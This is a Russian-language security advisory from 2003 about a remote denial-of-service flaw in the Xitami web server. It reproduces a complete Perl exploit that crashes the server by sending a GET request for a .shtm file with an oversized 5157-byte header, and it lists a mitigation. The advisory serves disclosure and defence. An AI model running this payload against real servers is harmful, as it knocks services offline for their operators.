Удаленный DoS против Xitami Web сервера

Дата публикации:
23.09.2003
Всего просмотров:
1105
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: - Xitami 2.5B4 (bw3225b4.exe), Xitami 2.4D9 (bw3224d9.exe).

Описание: Уязвимость обнаружена в Xitami Web сервере. Удаленный атакующий может аварийно завершить работу Web сервера.

Удаленный атакующий может послать http get запрос к .shtm файлу с http заголовком размером более 5154 байт, за которым следует “:”, чтобы аварийно завершить работу Xitami с ошибкой Microsoft Visual C++ Runtime Error в XIWIN32.EXE.

#!/usr/local/bin/perl
#
# Simple exploit for Imatix Xitami Webserver on Windows NT  
#
# Sending a GET request for a *.shtm file with a header field of >= 5154 
bytes, followed by a ":",
# will crash the service.
#
# Vulnerable versions:
# - Xitami 2.5B4 (bw3225b4.exe)
# - Xitami 2.5B4 (bs3225b4.exe)
# - Xitami 2.4D9 (bw3224d9.exe)
# - others?
#
# For legal purposes only !
#
# 22.09.2003 - Oliver Karow - oliver.karow[AT]gmx.de

use IO::Socket;

$ip="127.0.0.1";
$port=80;

$var="A" x 5157;

$mySocket=IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$ip, 
PeerPort=>$port, Timeout=>5);
$mySocket->autoflush(1);
  print $mySocket "GET /test.shtm HTTP/1.0\r\n".
        $var.": */*\r\n\r\n"; 

@answer=<$mySocket>;
$length=@answer;
if ($length==0){die "\nService killed!\n";}
print @answer;
Возможно версии под другие платформы, отличные от Windows, также уязвимы.

URL производителя: http://www.ximati.com

Решение:Ограничьте максимальные размеры HTTP заголовков в HTTP прокси.

Ссылки: Denial of service vulnerability in Xitami Open Source Web Server

или введите имя

CAPTCHA